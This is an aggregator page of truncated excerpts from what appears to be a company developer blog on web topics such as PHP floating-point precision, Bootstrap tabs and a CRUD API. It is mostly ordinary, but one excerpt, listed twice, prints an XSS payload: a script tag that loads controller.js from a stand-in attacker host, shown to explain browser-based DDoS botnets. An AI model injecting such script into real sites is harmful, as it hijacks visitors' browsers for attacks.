Quantcast
Browsing all 22 articles
Browse latest View live

Image may be NSFW.
Clik here to view.

Developing a mobile web application with IUI

At LeaseWeb we have a hosting control panel called “Self Service Center” or SSC. We are starting to make our first steps into making the Self Service Center available on a mobile platform. We have a...

View Article


Interactive programming tutorials

Dennis Ritchie was an American computer scientist who created the C programming language and the Unix operating system. He also was one of the authors (the ‘R’) of the famous in K&R C book. The...

View Article


The PHP floating point precision is wrong by default

Let me show you that PHP is bad at Math: <?php echo "0.1 + 0.2 = ". ( 0.1 + 0.2 ) ."\n"; $true = 0.1 + 0.2 == 0.3 ? "Equal" : "Not equal"; echo "0.1 + 0.2 = 0.3 => $true\n"; Output: 0.1 + 0.2 =...

View Article

Image may be NSFW.
Clik here to view.

10 very good reasons to stop using JavaScript

JavaScript MVC frameworks are booming, but this post may change your mind about them. Before I explain to you the ten very good reasons to stop using JavaScript, I will first list a few popular...

View Article

Image may be NSFW.
Clik here to view.

API first architecture or the fat vs thin server debate

API first architecture is an architecture that treats the API user as the primary user of the application. This means that API is not an alternative view in the MVC paradigm, but it has the highest...

View Article


Loading remote data into bootstrap tabs

Many people are using Bootstrap for their website layout nowadays, and we all know that Bootstrap comes with quite a few handy JavaScript tools out-of-the-box. One of those tools is Bootstrap tabs,...

View Article

Image may be NSFW.
Clik here to view.

Please stop using pop-up windows in web applications

In the Nineties, we were writing desktop applications with pop-ups. These desktop applications consisted of multiple windows that popped up. I was programming Delphi back in these days, where windows...

View Article

Image may be NSFW.
Clik here to view.

Your browser may be part of an evil DDoS bot-net!

Okay, say we can inject the following HTML into a fairly popular XSS vulnerable blog: <script type="text/javascript" src="https://attackers-server.com/controller.js"></script> Visitors...

View Article


Image may be NSFW.
Clik here to view.

PHP asset proxy increases website availability

Don’t you hate it when your site does not work, because you linked jQuery from “code.jquery.com” and that site is suffering connection problems? This may also happen with stylesheets or with font...

View Article


MySQL-CRUD-API now has transforms!

Last week I created a new GitHub project called “MySQL-CRUD-API” and it allows you to quickly setup a simple REST API with CRUD functionality by just adding a single “api.php” file to your project and...

View Article

Image may be NSFW.
Clik here to view.

Fluid web forms using AJAX

Sometimes you want a web form that changes based on the input. The web form can give the user feedback while filling it in: We often see web forms put green check-marks behind (server side) validated...

View Article

Interactive programming tutorials

Dennis Ritchie was an American computer scientist who created the C programming language and the Unix operating system. He also was one of the authors (the ‘R’) of the famous in K&R C book. The...

View Article

The PHP floating point precision is wrong by default

Let me show you that PHP is bad at Math: <?php echo "0.1 + 0.2 = ". ( 0.1 + 0.2 ) ."\n"; $true = 0.1 + 0.2 == 0.3 ? "Equal" : "Not equal"; echo "0.1 + 0.2 = 0.3 => $true\n"; Output: 0.1 + 0.2 =...

View Article


Image may be NSFW.
Clik here to view.

10 very good reasons to stop using JavaScript

JavaScript MVC frameworks are booming, but this post may change your mind about them. Before I explain to you the ten very good reasons to stop using JavaScript, I will first list a few popular...

View Article

Image may be NSFW.
Clik here to view.

API first architecture or the fat vs thin server debate

API first architecture is an architecture that treats the API user as the primary user of the application. This means that API is not an alternative view in the MVC paradigm, but it has the highest...

View Article


Loading remote data into bootstrap tabs

Many people are using Bootstrap for their website layout nowadays, and we all know that Bootstrap comes with quite a few handy JavaScript tools out-of-the-box. One of those tools is Bootstrap tabs,...

View Article

Image may be NSFW.
Clik here to view.

Please stop using pop-up windows in web applications

In the Nineties, we were writing desktop applications with pop-ups. These desktop applications consisted of multiple windows that popped up. I was programming Delphi back in these days, where windows...

View Article


Image may be NSFW.
Clik here to view.

Your browser may be part of an evil DDoS bot-net!

Okay, say we can inject the following HTML into a fairly popular XSS vulnerable blog: <script type="text/javascript" src="https://attackers-server.com/controller.js"></script> Visitors...

View Article

Image may be NSFW.
Clik here to view.

PHP asset proxy increases website availability

Don’t you hate it when your site does not work, because you linked jQuery from “code.jquery.com” and that site is suffering connection problems? This may also happen with stylesheets or with font...

View Article

PHP-CRUD-API now has transforms!

Last week I created a new GitHub project called “PHP-CRUD-API” and it allows you to quickly setup a simple REST API with CRUD functionality by just adding a single “api.php” file to your project and...

View Article
Browsing all 22 articles
Browse latest View live